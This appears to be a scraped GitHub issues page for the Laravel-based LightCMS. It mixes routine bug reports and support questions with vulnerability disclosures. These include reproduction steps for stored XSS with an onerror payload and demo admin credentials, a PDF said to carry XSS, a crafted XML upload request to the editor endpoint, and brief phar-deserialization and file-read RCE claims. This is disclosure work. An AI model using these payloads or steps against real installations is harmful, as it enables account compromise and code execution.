eddy8 / lightcms
LightCMS is a lightweight CMS built on Laravel; it can also be used as a general-purpose admin framework. A lightweight cms/admin framework powered by Laravel.
License: Apache License 2.0
View file
/resources/views/admin/content/add.blade.php line 287
@if(isset($model) && $field->is_required == \App\Model\Admin\EntityField::EDIT_DISABLE)
is_required should be changed to is_edit. This condition checks whether the field is editable, not whether it is required. Please verify.
The image:make function in fetchImageFile can trigger phar deserialization. Combined with the deserialization chain of the Laravel framework, it can cause a remote code execution vulnerability.
lightcms latest version (v1.3.7)
Please see this link for details.
Watched the demo and it looks very good. I heard Laravel is hard to deploy, though, so I haven't tried it yet; just showing my support for now.
The backend only has image upload handling; video uploads are not handled.
There's no escaping being done before printing out the values of noun, verb, and exclusive in the SensitiveWords page.
Navigate to http://lightcms.bituier.com/admin/login & Log in to the background with the account admin and password admin
Navigate to http://lightcms.bituier.com/admin/SensitiveWords/create & add the below-shared payload as the exclusive field value.
Payload - </span><img src=1 onerror=alert(1) /><span>
Visit page http://lightcms.bituier.com/admin/SensitiveWords, the payload will be triggered.
Bro, what about the database?
Image loading for our company site is rather slow; I'd like image uploads to be integrated with OSS.
NEditorController has the entry point for storing images.
Is it enough to just rewrite the uploadImage entry point:
$result = $file->store(date('Ym'), config('light.neditor.disk'));
if (!$result) {
    return [
        'code' => 3,
        'msg' => '上传失败'
    ];
}
or can a new one be added through an extension package instead?
Message shown: Internal server error, please contact the administrator
log:
production.ERROR: No application encryption key has been specified. {"exception":"[object] (RuntimeException(code: 0): No application encryption key has been specified. at D:\Project\cms\vendor\laravel\framework\src\Illuminate\Encryption\EncryptionServiceProvider.php:42)
[stacktrace]
Solution:
Regenerate .env and run
php artisan key:generate
A stored cross-site scripting (XSS) vulnerability exists in LightCMS that allows a user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger an XSS attack.
%PDF-1.4
%1111
1 0 obj
<<
/CreationDate (D:20210619104632+08'00')
/Creator (xss)
/Producer (PDF-XChange Core API SDK \(7.0.324.2\))
>>
endobj
2 0 obj
<<
/Metadata 3 0 R
/Pages 4 0 R
/Type /Catalog
>>
endobj
3 0 obj
<<
/Length 2983
/Subtype /XML
/Type /Metadata
>>
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about=""
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
xmlns:xmp="http://ns.adobe.com/xap/1.0/"
xmlns:pdf="http://ns.adobe.com/pdf/1.3/">
<dc:format>application/pdf</dc:format>
<xmpMM:DocumentID>uuid:9c93bc08-8e4e-46cb-b28f-824c693821a4</xmpMM:DocumentID>
<xmpMM:InstanceID>uuid:2cd63bea-24ca-4ef8-a12c-015da3b28c96</xmpMM:InstanceID>
<xmp:CreateDate>2021-06-19T10:46:32+08:00</xmp:CreateDate>
<xmp:CreatorTool>迅捷PDF编辑器 7.0.324.2</xmp:CreatorTool>
<xmp:ModifyDate>2021-06-19T10:52:02+08:00</xmp:ModifyDate>
<pdf:Producer>PDF-XChange Core API SDK (7.0.324.2)</pdf:Producer>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
Spent a whole day on this and still can't figure out how to generate the left-side menu myself.
The lightcms content management system uses an outdated ueditor component, therefore there is a DOM XSS vulnerability that allows users to upload an XML file containing a malicious payload which could trigger the vulnerability and lead to an XSS attack.
Log into the admin backend, click on Content Management - Articles - Upload Image
Then upload an image and modify the upload interface, file extension and file header.
Modify the file upload interface to be 'uploadfile'
POST /admin/neditor/serve/uploadfile
-----WebKitFormBoundary4aYhw3HzIslHq0Kq
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/xml
<?xml version="1.0" encoding="GB2312" ?>
<html>
<head>
</head><body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1);</something:script>
</body>
</html>
------WebKitFormBoundary4aYhw3HzIslHq0Kq--
User management: roles cannot be assigned to users.
There is no filtering when downloading external images, which can cause arbitrary file reading and remote code execution.
lightcms latest version (v1.3.5)
Place the PHP file you want to be executed on your own server, and download it: